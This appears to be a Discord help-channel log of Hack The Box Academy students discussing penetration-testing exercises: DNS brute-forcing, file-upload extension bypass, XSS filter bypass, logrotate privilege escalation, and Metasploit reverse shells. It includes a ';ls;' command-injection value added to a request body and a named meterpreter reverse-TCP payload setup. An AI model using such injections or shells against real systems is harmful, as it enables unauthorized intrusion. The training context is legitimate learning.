The wordlist should be ~94k words
It is
Don't use the codeblock rules
Everything is provided in the resources button
Then I have the correct one
Yep, that's correct
Thought my scrshot was corrupt. LOL
Then I will just take a drink, smoke one and wait.
And in the meantime read the next module.
Correct. My mistake.
To save headache later
save any creds you find
Hmm, good one. Because it is "just" the Academy, I tend to not make many notes.
how long does it normally take to find the right DNS record? in the real world, wouldn't it take even longer?
unless you use -t 100 or something?
with what method? What record?
brute forcing domains with subbrute
Not needed. You can get the answer instantly.
ok
Just use dig or so, but point it at the machine you spun up.
I mean to brute force subdomains
ok then what's the point in ever using subbrute?
why is the exercise having me do it?
for the "inlanefreight.htb" domain on the target name server <- look at the last 2 words.
does it?
Yes use subbrute if it tells you
can you tell again what module/section?
yes because dig AXFR gives me an error if I try and subbrute is included as a means of brute forcing subdomains
check
the question is Find all available DNS records for the "inlanefreight.htb" domain on the target name server and submit the flag found as a DNS record as the answer. dig won't work it gives me an error
I tried so the only answer is subbrute
and subbrute is slowly giving me more and more results
why would anyone use subbrute if you always could get the answer with dig instantly?
Then wait
You won't
You have to find the subdomain first
ok got it
Excuse me, do you think that it's okay to skip the vulnerability scanning module for now?
I finished that right before aen
aen?
The last module
I wouldn't skip.
because Dig can have its security configured correctly.
If your aim is to go towards a cert, go through all the modules.
Also you have the practical exercise at the end
If you're not going towards an exam, and don't care about vuln scanning, go for it
thing is i am writing everything, and this module doesn't feel very exciting, and it feels more directed to real cybersec which is not yet now
It doesn't take long to get through tbh
thing is, i am writing ALL the lessons using cherry tree
All of academy is cybersec

Are you summarizing or copying verbatim
I hope not the latter
Even if you know the subject, go through the module
It's a must to apply for a cert exam even.
Plus you always learn something.
Most of the time.
absolutely, but is it This time? i don't have an exam
Just... why skip skip skip skip, then get to the end and post here going "how do I think this?"
It happens so often
i don't do that, just this topic and nessus, makes me feel like i am doing Blue team
Then why are you even going through it if you're just copying the content
so demotivating hahahaha
The vuln assessment module easily takes the least amount of time
forces you to read everything
You started it..
reading is good for your brain
..make the most of it and finish it
I have one of those?
LMAO
Also guys, when do you suggest to start doing some easy machines?
because i was trying to do as the first lesson suggested, to do an easy machine immediately after each module
Whenever you want
but most of the times, you find stuff you still didn't learn about yet
Correct
That's the fun
Because the labs are created independently of academy
It's always a game of research
All boxes come with research... there hasn't been a single box where the academy modules are sufficient
thing is, i don't want to look at walkthroughs
Makes your brain work real hard.
Well active machines don't have walkthroughs
Almost every machine is going to have something you don't know about
You don't need to look at walkthroughs btw
And you don't HAVE to look at a walkthrough
Encounter something? Google that something
you beat me to it
thing is, you don't have the confidence when you are at such a stage
Not Google "<box>"
like how are you sure you didn't miss up on something
Neither did I when I signed up in 2017
It's a shift in perspective
Instead of looking for the box, looking for the technology in use
See what seems "off"
getting started - public exploits
That section shows how to look for things
As every box has a publicly researchable vuln
It's literally part of the requirements
do you mean by every box, a machine or a question?
Read more below about what we require for each submitted machine to improve your chances in getting accepted!
On the main site ^
box refers to machine in https://app.hackthebox.com/machines
yeah, whitebox machine, greybox machine and blackbox machine
All the boxes in hack the box are considered blackbox despite some of them leaking the code intentionally
bruteforcing should always be a last step right?
Most of the boxes don't need bruteforcing above 2 minutes when the right techniques are used
will the flag be in the traditional HTB{flag} format?
On boxes not. There it is a hash
usually, but not always
I mean for the section I'm on in academy
Sorry. I missed the context
the Attacking DNS section of Attacking Common Services
They will be yes.
ok thanks
As far as I see on the Academy all the time.
ok thanks
there are some modules which dont use this format but they are very few
ok got it
thx for that clarification
i have seen flags that are in hexadecimal format i think
in the real world, if dig is configured correctly and dig AXFR doesn't work on an actual website, and if in that case subbrute is necessary, doesn't that mean doing subbrute in that instance will take much longer than doing subbrute on Hack the Box Academy?
or a hash probably
I know I asked earlier but I think I got an answer to the wrong question
because I didn't clarify well enough
it would take longer in the same way that accessing a website on the net might take longer than accessing a website on hackthebox academy. It just depends on what your ping is to the dns server.
ok so basically, how much latency is there?
There weren't any errors in my php command but I think there may have been some errors with the magic bytes. Can I put some more magic bytes in the request and cut it off randomly?
ahhh
yeah
thanks
wait a min
that's the right extension
php3 is allowed
php isnt
curl the url to see the contents without it erroring out
if you want to see the contents that is
is the php3 extension wrong or sumin? In the fuzz it said it was vulnerable to php 3
sometimes it's an md5 hash
just because it's accepted doesn't mean it's vulnerable
just because it uploads doesn't mean it's the right one
wait, then if its accepted, how do we KNOW which one is vulnerable?
because in burp it gave the same lengths
and there were possibly 5 others
test each of the accepted ones; visiting in browser and looking at the page source will be a good clue
the accepted, but not vulnerable, ones comment out the code
<!-- -->
okay let me try that
A fun but simple project for you would be to automate the vuln check
sometimes its just text that doesnt follow any format
Right. I am losing patience as I am doing something wrong for the Pwd attack/mutate section. It's all fun here, but in the meantime I also want to find the right pwd. Who is so kind to get me on track? Possibly in a DM, so I don't paste spoilers?
i can dm
that is kind of you
@fathom pendant thank you guys for your help I managed to solve it @safe star & @waxen totem @unborn summit . @fathom pendant u remember yesterday when it was base 64 encoding. Could you please tell me why the heck it was doing that?
And I want to thank @unborn summit for pointing out that I forgot about netexec
ok so I got several domains
but I haven't gotten any flag.
I think that its related to the last URL it gave me.
wait I tried that
I found the flag already tho just before I saw your answer
you answered too late and what you said didn't work
ya I know I typed it wrong when typing it on discord
but when I did that included that bit
I deleted it because it was revealing the answer
ok
ya point taken. I thought if it was marked as a spoiler that it would be fine.
spoiler text does nothing
ok
Anyone can click it or even disable it in settings
You can still do some obfuscation behind the spoiler text
I.e. doing sub.domain.htb instead of the answer
ok I see got it
That way those who know, get it
Also it's not an htb discord feature, it's just a discord feature that can't be enabled/disabled on serverside
It's just baked into the markdown format
ok got it. I won't do it again.
Like heading tags
They can block things like masked links []() because they can do a regex search for text between [] and ()
is the next module difficult? the one on Pivoting, Tunneling, and Port Forwarding?
the current one seems easier than previous one
I know AD module will be super super difficult
@pine dune remember the conversation we had about my notion automation? Figured out how to do it in Obsidian using the dataview plugin,
Template Note
---
date: {{date}}
---
Review Note
```dataview
TABLE date
WHERE date AND date = date(yesterday) OR date = date(today) - dur(1 w) OR date = date(today) - dur(1 mo)
```
Hi folks. Can I please get a nudge on getting bob_adm credentials? Windows Privilege Escalation module
I moved to Kali what I thought was the file ... but it is empty...
can someone please help me?
looks like the file is empty
I know, lol
I guess that's supposed to be the file
but is empty
so obviously, can't get any password from an empty file.
is this a rabbit hole?
I tried the one that starts with ||"Strong"|| ... but that does not seem correct either, although the document indicates it corresponds to bob_adm
hi, can I DM you? stuck on same exercise.... I think I found the right file that contains bob_adm password but it is empty
Does anyone have machine spawning issue?
I cannot spawn the machine for the last 20 minutes
Okay I see. It's working now
Taking a side-step to module Cracking Passwords with Hashcat now. Very nice and some new stuff for me.
Recommended.
By me, for what that is worth LOL
Question, I've been reading the report on the exam is pretty important. Would it be a good idea to skip to the report module and write reports for each module? Or is it the last module on purpose?
It's near the end on purpose
As it requires some knowledge of other topics to complete, it's assuming you know the stuff
Also i wouldn't write a report for each module, as most aren't really gonna have enough to fill up a report on
Just start getting used to making proper notes. Choose your favorite note-taking app and get used to it. Read about what a proper report needs and then just make it a habit to make notes that would fit in a report..
Really, read up a bit about what a proper report is. The report is not for you. It is for the client you work for.
well yeah, but being truly honest, it'd be BETTER to do reports on retired machines
unless you want to just do the skill assessments?
¯\_(ツ)_/¯
but as i said the reporting module requires knowledge from a fair bit of the modules to be successful at completing it, unless you just read the reporting portions then come back later to complete it
I dont know. I just keep on working on making the best and most efficient notes for machines. Notes that I could use in a report.
^
notes will serve better
when I did AEN blind i had 2 screenshots for each step i included in the report; the raw screenshot for my notes and the redacted screenshots for the report
Well, does it not all start with proper notes?
help me out pls, what is AEN?
Attacking Enterprise Networks, the capstone module of the pentester path
Got it.
the module itself is a walkthrough, which is why it's recommended to do it blind:
- don't read questions
- don't read the module
just boot2DA
it's a great test of methodology
Nice.
genuinely if you took good notes on the preceding modules you'll be able to complete AEN without issues
afterwards reading the module can help you see if you could have done something differently
but some parts of AEN (reading) rely on tools that i don't use often, like proxychains and msfconsole as a revshell/pivot tool
ligolo-ng >>>> most other tools out there
I only still struggle with how I want to note and format machine-sets. Not really struggle, but for myself on how best to make notes. I use Obsidian, so that helps. Like having overview, then filling that in along the line and so on. With folders for machines in the set. Practicing this I do now on Pro Labs.
i suggest looking into the canvas feature
Don't you still need proxychains for ligolo? cos IK you need it for chisel
yup
nope
it operates on its own stack
I use canvas
On obsidian there's also the mermaid flowcharts thing, I prefer using it over canvas cos it's all in md instead of json
#modules message here's an example ss of how i organize things in canvas
in reality I prefer drawing all my notes using a pen tablet
thx for the hint. I will look into it.
mermaid charts are good for an overview of steps
tbh you can utilize both;
overview of steps with a mermaid chart
canvas to organize
I try to create that as well now. Not with Mermaid. Just like a complete attack chain. I hope it makes sense.
ye
And I mentioned earlier using dataview plugin as a tool to remind you to review notes:
#modules message
ye
I saw it. One thing at a time.
Create diagrams and visualizations using text and code.
I only yesterday saw you can use tips in Obsidian.
BTW wdym by doing AEN blind? do you just spawn the target(s) and only answer the questions after achieving DA? @fathom pendant
It is like a magic box, where you slowly discover little nice things.
yep it's one target for the whole module
So you just don't look at each section of the module then?
nope
Noted... will do that, seems like a good way to get prepared for the exam
(he says while only being 3% done with the path)
having gone back through on notes several times on it; it's Super easy to dive into unrelated things just focus on what's in front of you and remember that enumeration is a recursive loop
once you find a new path you start your enumeration loop over again
you will use just about everything
Yep. And that's what I find hard to document.
Because in the end there should be a result from the report. One, and very important: to get the mgmt layer to see why they should keep on investing in CyberSec defense. And two, to have the tech guys see how they can improve at the spot and also give them some knowledge to prevent security issues.
if it's a path forward: utilizing the vuln found on host x the tester attained remote code execution and gained access to the host system directly
detail steps on host
utilizing info found on share y the tester was able to move to another host y on the network, further compromising it
Yeah. And still I stress the importance of addressing mgt. Those are the ones having access to budget somehow.
Anyway, I am going to catch some sleep. It was a pleasure peeps.
I wouldn't worry about the phrasing and writing during the engagement, just take notes, write the report after
That's fair, but there's some parts of the report that I think aren't worth writing until after the fact
exec summary and all that
Yes that, lol, but for the most part good documenting goes a long way
I mean if you write notes well enough
most of your report is done when you
finish the engagement
find the file
Hi! I'm going through a module on the basics of Linux. There are the last two tasks regarding the kernel release and the name of the network with an MTU of 1500. I entered uname -r and wrote out the release in the x.x.x format, then ifconfig | grep 'MTU 1500' and entered the names of first one of the networks with MTU 1500, then the other, then both separated by a space. Both answers are incorrect. What am I wrong about?
I work in HTB workstation.
theres still a target to ssh to
whatever you're using as your workstation doesn't matter
pwnbox != target
I don't have an ip to connect to.
the target is the 10.129.x.x address (sometimes a public_IP:port) that's spawned when you click "click here to spawn target"
look above the questions
should say
Target: Click here to spawn target
Oh, Ok
Spawn instance spawns the in-browser attack box aka pwnbox, which is not the target
Thanks, I forgot about that.
Hi everyone
Did anyone here succeed in the XSS Filter Bypass lab? Could really use a hand
How exactly are you connecting to the WS001, can you DM me the command you're using?
.
Thanks Ima have to install that plugin. I installed something (maybe that) earlier for reviewing my notes and reminding me but it didn't work :/
I am connected... now i am trying cert.pem to pfx.
Anybody? XD
In the lab, I'm able to pass the xss filter with the <object> and base64 encode of the payload. Directing the user to the exploit server proves to be problematic. when giving relative directory, an invalid URL error arises, when putting full url, hitting CORS violation although its the same site. Can't get any grasp on how to solve it and need some guidance
dm me what you got @noble raft and I will have a look in a bit
Anyone available for help for the Linux Privesc - Logrotate section?
I've got the payload/command exactly as in ippsec's video, but still can't get it to execute anything.
did it just yesterday and it was very frustrating. DM if you'd like
@honest crane ^ (forgot to mark as reply)
I just DM'd you
Damn bro either type it down or take a screenshot
...
$ Get-CimInstance -ClassName win32_OperatingSystem | select Version
Answer format(see question)
Windows X
ohhhh okay thank you! i feel silly now 
```text
Building wheels for collected packages: scrypt
  Building wheel for scrypt (pyproject.toml) ... error
  error: subprocess-exited-with-error

  × Building wheel for scrypt (pyproject.toml) did not run successfully.
  │ exit code: 1
  ╰─> [42 lines of output]
      running bdist_wheel
      running build
      running build_py
      creating build\lib.win-amd64-cpython-313\scrypt
      copying scrypt\scrypt.py -> build\lib.win-amd64-cpython-313\scrypt
      copying scrypt\__init__.py -> build\lib.win-amd64-cpython-313\scrypt
      creating build\lib.win-amd64-cpython-313\scrypt\tests
      <SNIP>
      scrypt-1.2.1/libcperciva/crypto/crypto_aes.c(6): fatal error C1083: Cannot open include file: 'openssl/aes.h': No such file or directory
      error: command 'C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.42.34433\bin\HostX86\x64\cl.exe' failed with exit code 2
      [end of output]

  note: This error originates from a subprocess, and is likely not a problem with pip.
  ERROR: Failed building wheel for scrypt
Failed to build scrypt
ERROR: Failed to build installable wheels for some pyproject.toml based projects (scrypt)
```
Hey, did someone have such an issue when installing requirements for micr0shell in Defense Evasion module?
UPD: https://github.com/ethereum/pyethereum/issues/888#issuecomment-553635125, this resolved the issue for me
you using a python environment?
yes, venv
can you check if this:
C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.42.34433\\bin\\HostX86\\x64\\cl.exe
exists?
yeah, it exists
Welp, I've never done that module nor had that issue so... 
I'd look for that header file though
okay, thanks tho
Module: Shells and Payloads
Currently I'm trying to compromise the rconfig-webserver (Version 3.9.6).
I tried using metasploit, but I'm not able to gain a shell, as shown in the module.
I use the provided attackbox. I can tell, I set the options correctly.
-> RHOST
-> RPORT
-> payload (php/meterpreter/reverse_tcp)
as far as i know, this section is only for questions regarding the academy hack the box modules.
Look into your LHOST value, think if the machine can reach that IP address
Sorry I just joined just learning use
thx worked for me
yea no problem brother ❤️
I'd remove the images webserver and payload information as it's not a free module
Ok alright! I'm already done!
I did it for you!
Boiler
Hi guys! Does anyone know how many days I have to finish the SOC Analyst exam and how many attempts I can make? Thank you in advance.
Wow thnx that was really helpful
hello,
I have a question. Are VMs provided on the platform supposed to be cut off from the internet? In my module I'm tasked to download an enumeration script and use it on the machine but I'm unable to download it. After checking, turns out the VMs are cut off. I suppose I could use the SFTP protocol to move the file but it seems a little cumbersome to me.
Your thoughts ?
Yes, the targets do not have internet connection by default
Anyone know what Segmentation Fault (core dump) means. I have tried to look online and can't figure out why my reverse shell is giving this error and then the connection closes straight away on meterpreter multi handler
Module: Pivoting, Tunneling, and Port Forwarding
Section: Meterpreter Tunneling & Port Forwarding
I've a problem in this exercise i tried many times and I couldn't find the solution
Exercise 2: Try adding a rule that automatically adds ;ls; when we click on Ping, by matching and replace the request body of the Ping request. module --> proxies web
refrain from revealing info about a skill assessment
but to answer your question
- the accounts are there because that's how it's set up
- one is a service account user/pass
- You should be looking to try everything possible when you find new information; enumeration is an iterative process, the second you find something new to dig into you should be starting your enumeration processes over again.
I summarize my enum process with Analyze, Hypothesize, Try, Repeat
Analyze what you have in front of you
Hypothesize what you can do with that info
Try your hypothesis
Repeat until you find a break